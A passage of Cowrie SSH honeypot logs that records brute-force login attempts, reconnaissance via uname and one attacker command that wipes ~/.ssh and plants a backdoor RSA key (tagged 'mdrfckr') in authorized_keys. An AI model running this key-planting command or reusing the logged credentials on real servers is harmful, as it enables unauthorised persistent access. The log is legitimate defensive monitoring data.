fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:27:31.413764Z","src_ip":"212.227.125.160","session":"0d39e480cc7d"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:27:31.825934Z","src_ip":"212.227.125.160","session":"0d39e480cc7d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:32.932233Z","src_ip":"212.227.125.160","session":"0d39e480cc7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40870,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfe22451a536","protocol":"ssh","message":"New connection: 212.227.235.229:40870 (1.2.3.4:22) [session: bfe22451a536]","sensor":"my-vps","timestamp":"2025-08-28T05:27:45.393543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:27:45.394923Z","src_ip":"212.227.235.229","session":"bfe22451a536"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:27:45.539358Z","src_ip":"212.227.235.229","session":"bfe22451a536"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:27:46.046904Z","src_ip":"212.227.235.229","session":"bfe22451a536"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:47.350894Z","src_ip":"212.227.235.229","session":"bfe22451a536"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46730,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a2e6a377764","protocol":"ssh","message":"New connection: 212.227.125.160:46730 (1.2.3.4:22) [session: 3a2e6a377764]","sensor":"my-vps","timestamp":"2025-08-28T05:27:48.814545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:27:48.815902Z","src_ip":"212.227.125.160","session":"3a2e6a377764"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:27:48.918703Z","src_ip":"212.227.125.160","session":"3a2e6a377764"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:27:49.335921Z","src_ip":"212.227.125.160","session":"3a2e6a377764"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:27:49.671217Z","src_ip":"212.227.125.160","session":"3a2e6a377764"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:27:49.672033Z","src_ip":"212.227.125.160","session":"3a2e6a377764"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:49.914511Z","src_ip":"212.227.125.160","session":"3a2e6a377764"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:49.915592Z","src_ip":"212.227.125.160","session":"3a2e6a377764"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60582,"dst_ip":"1.2.3.4","dst_port":22,"session":"340618916d03","protocol":"ssh","message":"New connection: 212.227.235.229:60582 (1.2.3.4:22) [session: 340618916d03]","sensor":"my-vps","timestamp":"2025-08-28T05:27:53.425860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:27:53.426746Z","src_ip":"212.227.235.229","session":"340618916d03"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:27:53.569780Z","src_ip":"212.227.235.229","session":"340618916d03"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:27:54.000907Z","src_ip":"212.227.235.229","session":"340618916d03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:27:54.367514Z","src_ip":"212.227.235.229","session":"340618916d03"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:27:54.368182Z","src_ip":"212.227.235.229","session":"340618916d03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:54.516049Z","src_ip":"212.227.235.229","session":"340618916d03"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:54.517068Z","src_ip":"212.227.235.229","session":"340618916d03"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.98.91","src_port":41138,"dst_ip":"1.2.3.4","dst_port":22,"session":"76d8d2c6b58f","protocol":"ssh","message":"New connection: 101.36.98.91:41138 (1.2.3.4:22) [session: 76d8d2c6b58f]","sensor":"my-vps","timestamp":"2025-08-28T05:27:59.352336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:27:59.352993Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:27:59.469527Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.login.success","username":"root","password":"Root2022@","message":"login attempt [root/Root2022@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:27:59.976157Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:28:00.300495Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:28:00.301172Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:28:00.302250Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:00.419984Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:28:00.674730Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T05:28:00.675389Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T05:28:00.793711Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:00.794520Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.98.91","src_port":49748,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a5b3a07431a","protocol":"ssh","message":"New connection: 101.36.98.91:49748 (1.2.3.4:22) [session: 4a5b3a07431a]","sensor":"my-vps","timestamp":"2025-08-28T05:28:00.899192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:28:00.900091Z","src_ip":"101.36.98.91","session":"4a5b3a07431a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:28:01.006263Z","src_ip":"101.36.98.91","session":"4a5b3a07431a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T05:28:01.472193Z","src_ip":"101.36.98.91","session":"4a5b3a07431a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:02.580885Z","src_ip":"101.36.98.91","session":"4a5b3a07431a"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.98.91","src_port":49762,"dst_ip":"1.2.3.4","dst_port":22,"session":"e16d63f909e1","protocol":"ssh","message":"New connection: 101.36.98.91:49762 (1.2.3.4:22) [session: e16d63f909e1]","sensor":"my-vps","timestamp":"2025-08-28T05:28:02.686734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:28:02.687697Z","src_ip":"101.36.98.91","session":"e16d63f909e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:28:02.793673Z","src_ip":"101.36.98.91","session":"e16d63f909e1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:28:03.259403Z","src_ip":"101.36.98.91","session":"e16d63f909e1"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:03.366729Z","src_ip":"101.36.98.91","session":"76d8d2c6b58f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:03.367908Z","src_ip":"101.36.98.91","session":"e16d63f909e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35870,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa314903e581","protocol":"ssh","message":"New connection: 212.227.125.160:35870 (1.2.3.4:22) [session: fa314903e581]","sensor":"my-vps","timestamp":"2025-08-28T05:28:03.821409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:28:03.822262Z","src_ip":"212.227.125.160","session":"fa314903e581"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:28:03.926471Z","src_ip":"212.227.125.160","session":"fa314903e581"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:28:04.239104Z","src_ip":"212.227.125.160","session":"fa314903e581"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:28:05.345823Z","src_ip":"212.227.125.160","session":"fa314903e581"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46214,"dst_ip":"1.2.3.4","dst_port":22,"session":"a008cc0c99cd","protocol":"ssh","message":"New connection: 212.227.235.229:46214 (1.2.3.4:22) [session: a008cc0c99cd]","sensor":"my-vps","timestamp":"2025-08-28T05:28:22.781200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:28:22.782981Z","src_ip":"212.227.235.229","session":"a008cc0c99cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2